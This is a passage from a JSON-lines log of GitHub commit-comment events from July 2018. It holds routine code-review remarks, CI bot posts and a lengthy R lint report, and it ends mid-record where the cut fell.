{"id":"7902196292","type":"CommitCommentEvent","actor":{"login":"sstur"},"repo":{"name":"kodefox/KodeFox"},"payload":{"comment":{"id":29555949,"position":24,"line":24,"path":"dayOne.js","commit_id":"a78d0877066b060103624438267fee086daa2fee","created_at":"2018-07-01T00:01:49Z","updated_at":"2018-07-01T00:01:49Z","author_association":"MEMBER","body":"Let's split this into two lines. First get the object keys of each object into a variable. Then if the length is not the same you can return immediately. No need to continue if they are different length, right"}},"created_at":"2018-07-01T00:01:49Z"}
{"id":"7902199186","type":"CommitCommentEvent","actor":{"login":"altendky"},"repo":{"name":"ebroecker/canmatrix"},"payload":{"comment":{"id":29555954,"position":102,"line":249,"path":"canmatrix/canmatrix.py","commit_id":"a8893523319c4ede32e59ee19bf8420095945e41","created_at":"2018-07-01T00:04:43Z","updated_at":"2018-07-01T00:04:43Z","author_association":"COLLABORATOR","body":"`converter` is the modern name for `convert`.\r\n\r\nhttps://attrs.readthedocs.io/en/stable/api.html\r\n`Deprecated since version 17.4.0: convert`"}},"created_at":"2018-07-01T00:04:43Z"}
{"id":"7902199329","type":"CommitCommentEvent","actor":{"login":"yuhhaurlin"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29555956,"position":null,"line":null,"path":null,"commit_id":"c2f82f1ac18ed7fb48be1eb8d678a3cf32192069","created_at":"2018-07-01T00:04:54Z","updated_at":"2018-07-01T00:04:54Z","author_association":"COLLABORATOR","body":"OK. I will remove it. Thanks."}},"created_at":"2018-07-01T00:04:54Z"}
{"id":"7902201042","type":"CommitCommentEvent","actor":{"login":"Marenthyu"},"repo":{"name":"Marenthyu/NepBot"},"payload":{"comment":{"id":29555965,"position":5,"line":2121,"path":"main.py","commit_id":"68866e1b5aa7167fed1d1e1e6aaede7f36451564","created_at":"2018-07-01T00:06:45Z","updated_at":"2018-07-01T00:06:45Z","author_association":"OWNER","body":"This needs bracketing or the ... if is right-bound."}},"created_at":"2018-07-01T00:06:45Z"}
{"id":"7902201425","type":"CommitCommentEvent","actor":{"login":"altendky"},"repo":{"name":"ebroecker/canmatrix"},"payload":{"comment":{"id":29555966,"position":101,"line":248,"path":"canmatrix/canmatrix.py","commit_id":"a8893523319c4ede32e59ee19bf8420095945e41","created_at":"2018-07-01T00:07:11Z","updated_at":"2018-07-01T00:07:11Z","author_association":"COLLABORATOR","body":"Drop this...  it's a proper attrs attribute above already."}},"created_at":"2018-07-01T00:07:11Z"}
{"id":"7902203280","type":"CommitCommentEvent","actor":{"login":"davidfischer"},"repo":{"name":"rtfd/readthedocs.org"},"payload":{"comment":{"id":29555973,"position":39,"line":39,"path":"docs/advertising/ad-blocking.rst","commit_id":"f409a6179993869c8da1966680a55f12688c565c","created_at":"2018-07-01T00:09:09Z","updated_at":"2018-07-01T00:09:09Z","author_association":"CONTRIBUTOR","body":"In theory we could get blocked via CSS filters on other domains but so far I haven't seen that."}},"created_at":"2018-07-01T00:09:09Z"}
{"id":"7902204318","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29555976,"position":null,"line":null,"path":null,"commit_id":"14377fbb34526d71450d7d70eaa2c08ce807c827","created_at":"2018-07-01T00:10:18Z","updated_at":"2018-07-01T00:10:18Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-18](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-18-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-01T00:10:18Z"}
{"id":"7902206230","type":"CommitCommentEvent","actor":{"login":"altendky"},"repo":{"name":"ebroecker/canmatrix"},"payload":{"comment":{"id":29555978,"position":102,"line":249,"path":"canmatrix/canmatrix.py","commit_id":"a8893523319c4ede32e59ee19bf8420095945e41","created_at":"2018-07-01T00:12:19Z","updated_at":"2018-07-01T00:12:19Z","author_association":"COLLABORATOR","body":"Oh boy, `float_factory`...  First, float_factory is itself a parameter so we can't use it like this. \r\n At the point it's being evaluated here it's a `attr._make._CountingAttr`, the thing that the `@attr.s` decorator looks for.  Second, `converter` doesn't get applied to the provided default so that's broken as well.\r\n\r\nThe default can be addressed by defining this attribute after `float_factory` (as it already is) then defining the default as:\r\n\r\n```python3\r\n@offset.default\r\ndef _(self):\r\n    return self.float_factory(0)\r\n```\r\n\r\nI'll have to think about the converter since the thing that gets called doesn't get passed anything except the only gets the value, not `self`.  \"It is given the passed-in value, and the returned value will be used as the new value of the attribute.\"  Maybe I could add `@attribute.converter` for them and have it also include `self`.  Maybe."}},"created_at":"2018-07-01T00:12:19Z"}
{"id":"7902208299","type":"CommitCommentEvent","actor":{"login":"BrunoxD"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29555981,"position":null,"line":null,"path":null,"commit_id":"3cefbd28014e1c4a4bb776e46efaeed4c6b392bf","created_at":"2018-07-01T00:14:30Z","updated_at":"2018-07-01T00:14:30Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-01T00:14:30Z"}
{"id":"7902208382","type":"CommitCommentEvent","actor":{"login":"BrunoxD"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29555982,"position":null,"line":null,"path":null,"commit_id":"139ec7ab54ae5d9aecaca06fd64e92871764480c","created_at":"2018-07-01T00:14:36Z","updated_at":"2018-07-01T00:14:36Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-01T00:14:36Z"}
{"id":"7902208483","type":"CommitCommentEvent","actor":{"login":"BrunoxD"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29555985,"position":null,"line":null,"path":null,"commit_id":"9c989e8cf9f646bb3c0306a2d5c7ce344e2afcf6","created_at":"2018-07-01T00:14:42Z","updated_at":"2018-07-01T00:14:42Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-01T00:14:42Z"}
{"id":"7902209292","type":"CommitCommentEvent","actor":{"login":"wanfakir96"},"repo":{"name":"wanfakir96/miniature-octo-meme"},"payload":{"comment":{"id":29555989,"position":1,"line":1,"path":"README.md","commit_id":"1070e7e5274199cb698fa2066b0611fc4ce0e5df","created_at":"2018-07-01T00:15:35Z","updated_at":"2018-07-01T00:15:35Z","author_association":"OWNER","body":"https://circleci.com/docs/2.0/basics/"}},"created_at":"2018-07-01T00:15:35Z"}
{"id":"7902209792","type":"CommitCommentEvent","actor":{"login":"Megalunchbox"},"repo":{"name":"Megalunchbox/indev"},"payload":{"comment":{"id":29555991,"position":null,"line":null,"path":null,"commit_id":"ef9bd57810e37e6054a176cb0b48d5c35a15f486","created_at":"2018-07-01T00:16:11Z","updated_at":"2018-07-01T00:16:11Z","author_association":"OWNER","body":"also a bunch of states"}},"created_at":"2018-07-01T00:16:11Z"}
{"id":"7902210013","type":"CommitCommentEvent","actor":{"login":"MariaService"},"repo":{"name":"MariaService/Demo-Heroes"},"payload":{"comment":{"id":29555992,"position":null,"line":null,"path":null,"commit_id":"a45698917421392383d237af0215a747e4d201cb","created_at":"2018-07-01T00:16:26Z","updated_at":"2018-07-01T00:16:26Z","author_association":"OWNER","body":"# Retroespectiva\r\n* Debes tener Cuidado en subir los commit :-1: \r\n* **Describir** el commit que se esta subiendo o dar mas **referencia** de este :hurtrealbad: \r\n* Aprender a unr commit, cuando estos sean necesarios :+1: \r\n   `git rebase -i Squash`\r\n> _Sólo hay felicidad donde hay virtud y esfuerzo serio, pues la vida no es un juego._\r\n Aristóteles.\r\n\r\n\r\n"}},"created_at":"2018-07-01T00:16:26Z"}
{"id":"7902211809","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29555995,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-01T00:18:29Z","updated_at":"2018-07-01T00:18:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T00:18:29Z"}
{"id":"7902213194","type":"CommitCommentEvent","actor":{"login":"ericmjl"},"repo":{"name":"pymc-devs/pymc4"},"payload":{"comment":{"id":29555997,"position":45,"line":149,"path":"tests/test_model.py","commit_id":"ca9f334de1e8f73391a55a206348b45718fe639d","created_at":"2018-07-01T00:20:05Z","updated_at":"2018-07-01T00:20:05Z","author_association":"NONE","body":"@ferrine just helping you repeat the comment above."}},"created_at":"2018-07-01T00:20:05Z"}
{"id":"7902213392","type":"CommitCommentEvent","actor":{"login":"ericmjl"},"repo":{"name":"pymc-devs/pymc4"},"payload":{"comment":{"id":29555998,"position":27,"line":131,"path":"tests/test_model.py","commit_id":"ca9f334de1e8f73391a55a206348b45718fe639d","created_at":"2018-07-01T00:20:16Z","updated_at":"2018-07-01T00:20:16Z","author_association":"NONE","body":"from @ferrine\r\n \r\nHmm, I would avoid mutables in defaults. I think some more generic solution is needed but is not of high priority now"}},"created_at":"2018-07-01T00:20:16Z"}
{"id":"7902220715","type":"CommitCommentEvent","actor":{"login":"alecgrieser"},"repo":{"name":"apple/foundationdb"},"payload":{"comment":{"id":29556008,"position":16,"line":2437,"path":"flow/Platform.cpp","commit_id":"3f57d0226c915bb207685341061f4cef7f4ba8b4","created_at":"2018-07-01T00:28:14Z","updated_at":"2018-07-01T00:28:14Z","author_association":"CONTRIBUTOR","body":"If it needs to be a multiple of `sizeof(void *)`, won’t this fail if we pass in, say, 12?"}},"created_at":"2018-07-01T00:28:14Z"}
{"id":"7902221168","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29556009,"position":null,"line":null,"path":null,"commit_id":"c7ccb6b3b779579e6e344f4d65c682ce0985e573","created_at":"2018-07-01T00:28:45Z","updated_at":"2018-07-01T00:28:45Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-18](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-18-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-01T00:28:45Z"}
{"id":"7902221419","type":"CommitCommentEvent","actor":{"login":"rosszurowski"},"repo":{"name":"poketo/site"},"payload":{"comment":{"id":29556010,"position":3,"line":3,"path":"src/store/local-storage.js","commit_id":"5f098ee4108917c1e531238cc56132d1942cfc10","created_at":"2018-07-01T00:29:01Z","updated_at":"2018-07-01T00:29:01Z","author_association":"CONTRIBUTOR","body":"It seems like Android applications can decide in their WebView whether or not to allow `localStorage` to websites. This is a quick check to ensure we have a working `localStorage` utility before trying to use it. If we don't, we stub it out."}},"created_at":"2018-07-01T00:29:01Z"}
{"id":"7902221760","type":"CommitCommentEvent","actor":{"login":"alecgrieser"},"repo":{"name":"apple/foundationdb"},"payload":{"comment":{"id":29556012,"position":9,"line":497,"path":"flow/Platform.h","commit_id":"3f57d0226c915bb207685341061f4cef7f4ba8b4","created_at":"2018-07-01T00:29:26Z","updated_at":"2018-07-01T00:29:26Z","author_association":"CONTRIBUTOR","body":"Why did you remove `static` from the declaration here?"}},"created_at":"2018-07-01T00:29:26Z"}
{"id":"7902222979","type":"CommitCommentEvent","actor":{"login":"alecgrieser"},"repo":{"name":"apple/foundationdb"},"payload":{"comment":{"id":29556016,"position":9,"line":497,"path":"flow/Platform.h","commit_id":"3f57d0226c915bb207685341061f4cef7f4ba8b4","created_at":"2018-07-01T00:30:41Z","updated_at":"2018-07-01T00:30:41Z","author_association":"CONTRIBUTOR","body":"Oh, I see. You need that to define it outside this header file and have it get linked in correctly. Carry on. "}},"created_at":"2018-07-01T00:30:41Z"}
{"id":"7902226734","type":"CommitCommentEvent","actor":{"login":"natanbc"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29556024,"position":null,"line":null,"path":null,"commit_id":"3555276ab7ce1d61babe2d197d57a6978b5479ab","created_at":"2018-07-01T00:35:05Z","updated_at":"2018-07-01T00:35:05Z","author_association":"MEMBER","body":"![](https://cdn.discordapp.com/attachments/110373943822540800/454692301210648585/5d6.png)"}},"created_at":"2018-07-01T00:35:05Z"}
{"id":"7902229081","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29556032,"position":50,"line":50,"path":"Remittance.sol","commit_id":"03cf0e0b4bb827982c57d32bbc4e70cfe039f844","created_at":"2018-07-01T00:37:37Z","updated_at":"2018-07-01T00:37:37Z","author_association":"OWNER","body":"typo: not using logs here, using return codes instead"}},"created_at":"2018-07-01T00:37:37Z"}
{"id":"7902229293","type":"CommitCommentEvent","actor":{"login":"carlonchox30"},"repo":{"name":"Lemmynjash/Loan-Lending-System-PHP-MYSQL"},"payload":{"comment":{"id":29556033,"position":null,"line":null,"path":null,"commit_id":"a64365e926fa608b954ba32d7b0eb8e54d83e640","created_at":"2018-07-01T00:37:51Z","updated_at":"2018-07-01T00:37:51Z","author_association":"NONE","body":"Could you explain how to install the application in the xampp?"}},"created_at":"2018-07-01T00:37:51Z"}
{"id":"7902230959","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29556036,"position":48,"line":48,"path":"Remittance.sol","commit_id":"03cf0e0b4bb827982c57d32bbc4e70cfe039f844","created_at":"2018-07-01T00:39:43Z","updated_at":"2018-07-01T00:39:43Z","author_association":"OWNER","body":"assumes the gas cost will deter brute force attacks "}},"created_at":"2018-07-01T00:39:43Z"}
{"id":"7902234662","type":"CommitCommentEvent","actor":{"login":"JWGmeligMeyling"},"repo":{"name":"JWGmeligMeyling/blaze-persistence"},"payload":{"comment":{"id":29556041,"position":23,"line":440,"path":"core/api/src/main/java/com/blazebit/persistence/spi/JpaProvider.java","commit_id":"b7332d984c47d4636758d5431a521969e9fb1df9","created_at":"2018-07-01T00:44:21Z","updated_at":"2018-07-01T00:44:21Z","author_association":"OWNER","body":"Previous implementation that assumed PK was:\r\n\r\n```\r\nEntityType<?> fieldEntityType = delegate.entity(fieldType);\r\nSingularAttribute<?, ?> idAttribute = JpaMetamodelUtils.getIdAttribute(fieldEntityType);\r\n```\r\n\r\nAlso, the providers currently dont have access to `JpaMetamodelUtils`, so perhaps this method should be moved / copied to the `JpaProvider` interface as well."}},"created_at":"2018-07-01T00:44:21Z"}
{"id":"7902235424","type":"CommitCommentEvent","actor":{"login":"JWGmeligMeyling"},"repo":{"name":"JWGmeligMeyling/blaze-persistence"},"payload":{"comment":{"id":29556045,"position":23,"line":415,"path":"integration/datanucleus-5.1/src/main/java/com/blazebit/persistence/integration/datanucleus/DataNucleus51JpaProvider.java","commit_id":"b7332d984c47d4636758d5431a521969e9fb1df9","created_at":"2018-07-01T00:45:17Z","updated_at":"2018-07-01T00:45:17Z","author_association":"OWNER","body":"Not sure whether this is a good default value"}},"created_at":"2018-07-01T00:45:17Z"}
{"id":"7902235694","type":"CommitCommentEvent","actor":{"login":"SARASWANG"},"repo":{"name":"QinXiaotong/cnode"},"payload":{"comment":{"id":29556046,"position":null,"line":null,"path":null,"commit_id":"07d447db0533593e2c1886491af9b03462e71882","created_at":"2018-07-01T00:45:36Z","updated_at":"2018-07-01T00:45:36Z","author_association":"NONE","body":"> \r\n\r\n> \r\n\r\n> [``](\r\n\r\n- \r\n\r\n- [ ] #1. url\r\n\r\n)"}},"created_at":"2018-07-01T00:45:36Z"}
{"id":"7902236932","type":"CommitCommentEvent","actor":{"login":"Kerndog73"},"repo":{"name":"Kerndog73/STELA"},"payload":{"comment":{"id":29556050,"position":null,"line":null,"path":null,"commit_id":"f43905450b8bc5b4547ace7ada92c30004533904","created_at":"2018-07-01T00:47:07Z","updated_at":"2018-07-01T00:47:07Z","author_association":"OWNER","body":"That made one helluva difference. Coverage when from 83.78% to 90.525%. Awesome!\r\n\r\nNow I should probably stop messing around with continuous integration and do something useful."}},"created_at":"2018-07-01T00:47:07Z"}
{"id":"7902239904","type":"CommitCommentEvent","actor":{"login":"irfan1973"},"repo":{"name":"irfan1973/test-project"},"payload":{"comment":{"id":29556054,"position":null,"line":null,"path":null,"commit_id":"556a8a09593b5d5e22aa5b17261c36a90a2f7393","created_at":"2018-07-01T00:50:36Z","updated_at":"2018-07-01T00:50:36Z","author_association":"OWNER","body":"make it"}},"created_at":"2018-07-01T00:50:36Z"}
{"id":"7902241702","type":"CommitCommentEvent","actor":{"login":"powercombo"},"repo":{"name":"powercombo/dir"},"payload":{"comment":{"id":29556059,"position":null,"line":null,"path":null,"commit_id":"dc7c8024afe211e1cf8f59d1d8e94679d0a85845","created_at":"2018-07-01T00:52:55Z","updated_at":"2018-07-01T00:52:55Z","author_association":"OWNER","body":"#1"}},"created_at":"2018-07-01T00:52:55Z"}
{"id":"7902242442","type":"CommitCommentEvent","actor":{"login":"irfan1973"},"repo":{"name":"irfan1973/test-project"},"payload":{"comment":{"id":29556062,"position":null,"line":null,"path":null,"commit_id":"556a8a09593b5d5e22aa5b17261c36a90a2f7393","created_at":"2018-07-01T00:53:49Z","updated_at":"2018-07-01T00:53:49Z","author_association":"OWNER","body":"make it "}},"created_at":"2018-07-01T00:53:49Z"}
{"id":"7902260159","type":"CommitCommentEvent","actor":{"login":"IvankaPlesica"},"repo":{"name":"PMF-StrojnoUcenje2018/Sibirski-Plavci"},"payload":{"comment":{"id":29556105,"position":null,"line":null,"path":null,"commit_id":"6dd40cb6afe0d7c5d15b694b3fe4c6687a171454","created_at":"2018-07-01T01:14:17Z","updated_at":"2018-07-01T01:14:17Z","author_association":"COLLABORATOR","body":"Izvještaj"}},"created_at":"2018-07-01T01:14:17Z"}
{"id":"7902260759","type":"CommitCommentEvent","actor":{"login":"XuYeChao"},"repo":{"name":"XuYeChao/todo-master"},"payload":{"comment":{"id":29556107,"position":null,"line":null,"path":null,"commit_id":"2cf78cb0ab4f4883ab46beadbac245d0d204474b","created_at":"2018-07-01T01:15:02Z","updated_at":"2018-07-01T01:15:02Z","author_association":"OWNER","body":"1.以Mytodo为名创建数据库（默认是mysql数据库）\r\n2.转储Mytodo目录下的数据表\r\n3.打开dao文件夹，编辑dao.js。编辑最上面的配置\r\n4.用DOS界面转到项目目录下\r\n5.输入node app\r\n6.到浏览器访问\"localhost:3000\"或\"127.0.0.1:3000\"\r\n7.初始登陆账号/密码：root/123\r\n\r\n"}},"created_at":"2018-07-01T01:15:02Z"}
{"id":"7902261698","type":"CommitCommentEvent","actor":{"login":"IvankaPlesica"},"repo":{"name":"PMF-StrojnoUcenje2018/Sibirski-Plavci"},"payload":{"comment":{"id":29556111,"position":null,"line":null,"path":null,"commit_id":"6dd40cb6afe0d7c5d15b694b3fe4c6687a171454","created_at":"2018-07-01T01:16:09Z","updated_at":"2018-07-01T01:16:09Z","author_association":"COLLABORATOR","body":"predan izvještaj"}},"created_at":"2018-07-01T01:16:09Z"}
{"id":"7902262253","type":"CommitCommentEvent","actor":{"login":"HyperDuino"},"repo":{"name":"1010Technologies/pxt-makerbit"},"payload":{"comment":{"id":29556112,"position":null,"line":null,"path":null,"commit_id":"65286bf8692bbdd69bd7d98c7246cdff321773a5","created_at":"2018-07-01T01:16:48Z","updated_at":"2018-07-01T01:16:48Z","author_association":"CONTRIBUTOR","body":"Agreed. :)  Did I mess this one up when I changed it from \"backwards\" to \"reverse\"? "}},"created_at":"2018-07-01T01:16:48Z"}
{"id":"7902263261","type":"CommitCommentEvent","actor":{"login":"Songlore"},"repo":{"name":"freeCodeCamp/study-group-directory"},"payload":{"comment":{"id":29556116,"position":null,"line":null,"path":null,"commit_id":"53968970505eee1ac69818235a0c23c75316aa01","created_at":"2018-07-01T01:17:55Z","updated_at":"2018-07-01T01:17:55Z","author_association":"NONE","body":"Thank you!"}},"created_at":"2018-07-01T01:17:55Z"}
{"id":"7902264007","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bc/retina"},"payload":{"comment":{"id":29556118,"position":null,"line":null,"path":null,"commit_id":"002662d3eea76706eb6de58bc2991e242e85456e","created_at":"2018-07-01T01:18:42Z","updated_at":"2018-07-01T01:18:42Z","author_association":"NONE","body":"[inst/extdata/asalmon_mcw/main.r:2:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L2) *style:* **Variable or function name should be snake_case.**\n```r\n​LAMBDA_var <- 0.1 #Thin plate spline smoothing. Lambda=0 would be interpolation.\n^~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​RESOLUTION_var <- 500 #Plot width in pixels\n^~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​#TODO change path. make sure this main.r script is just outside the diagram_retina folder.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:8:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L8) *style:* **Lines should not be more than 80 characters.**\n```r\n​#todo verify these. see the tutorial here: https://github.com/bc/retina/blob/master/tutorial.md search for the part that starts with \"#[V point of the tear,\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:10:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L10) *style:* **Commas should always have a space after.**\n```r\n​    c(59,52,67),\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:10:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L10) *style:* **Commas should always have a space after.**\n```r\n​    c(59,52,67),\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:11:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L11) *style:* **Commas should always have a space after.**\n```r\n​    c(79,73,85),\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:11:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L11) *style:* **Commas should always have a space after.**\n```r\n​    c(79,73,85),\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:12:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L12) *style:* **Commas should always have a space after.**\n```r\n​    c(34,31,37))\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:12:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L12) *style:* **Commas should always have a space after.**\n```r\n​    c(34,31,37))\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:15:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:15:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Only use double-quotes.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                     ^~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:15:77:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Put spaces around all infix operators.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                                                                           ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:15:101:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Put spaces around all infix operators.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                                                                                                   ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:29:21:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L29) *style:* **Commas should never have a space before.**\n```r\n​        height = 45 ,# height of the counting frame in microns\n                   ~^\n```\n[inst/extdata/asalmon_mcw/main.r:29:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L29) *style:* **Commas should always have a space after.**\n```r\n​        height = 45 ,# height of the counting frame in microns\n                     ^\n```\n[inst/extdata/asalmon_mcw/main.r:34:28:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L34) *style:* **Commas should never have a space before.**\n```r\n​        extrapolate = TRUE ,          #Predicts densities to the equator.\n                          ~^\n```\n[inst/extdata/asalmon_mcw/main.r:36:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L36) *style:* **Lines should not be more than 80 characters.**\n```r\n​        rotation_ccw = -90, # when set to -90 degrees, the rotation is unaltered from the measured orientation.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:37:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L37) *style:* **Put spaces around all infix operators.**\n```r\n​        plot_suppress=TRUE)\n                    ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:39:29:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                           ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:39:49:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                                               ~^\n```\n[inst/extdata/asalmon_mcw/main.r:39:64:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                                                              ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:40:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L40) *style:* **Put spaces around all infix operators.**\n```r\n​par(mfrow=c(2,2))\n        ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:40:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L40) *style:* **Commas should always have a space after.**\n```r\n​par(mfrow=c(2,2))\n              ^\n```\n[R/composite.R:2:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L2) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description This is a subfunction, that is useful 